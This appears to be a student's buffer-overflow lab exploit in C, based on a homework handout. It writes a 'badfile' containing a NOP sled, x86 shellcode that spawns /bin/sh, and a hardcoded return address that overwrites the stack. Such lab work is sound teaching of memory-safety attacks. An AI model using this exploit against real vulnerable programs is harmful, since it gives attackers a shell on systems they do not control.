// Credit: given by our homework handout and modified, documented in lab report.

/* exploit.c */

/* A program that creates a file containing code for launching shell*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[]=
    "\x31\xc0" /* xorl %eax,%eax */
    "\x50" /* pushl %eax */
    "\x68""//sh" /* pushl $0x68732f2f */
    "\x68""/bin" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp,%ebx */
    "\x50" /* pushl %eax */
    "\x53" /* pushl %ebx */
    "\x89\xe1" /* movl %esp,%ecx */
    "\x99" /* cdql */
    "\xb0\x0b" /* movb $0x0b,%al */
    "\xcd\x80" /* int $0x80 */
;

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
   
    /* You need to fill the buffer with appropriate contents here */

    // Inject the shellcode into the buffer.
    strcpy(&buffer[33], shellcode);
    // Padding...
    strcpy(&buffer[57], "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    // Point ebp register to the injected code.
    strcpy(&buffer[16], "\xf8\xf2\xff\xbf");

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}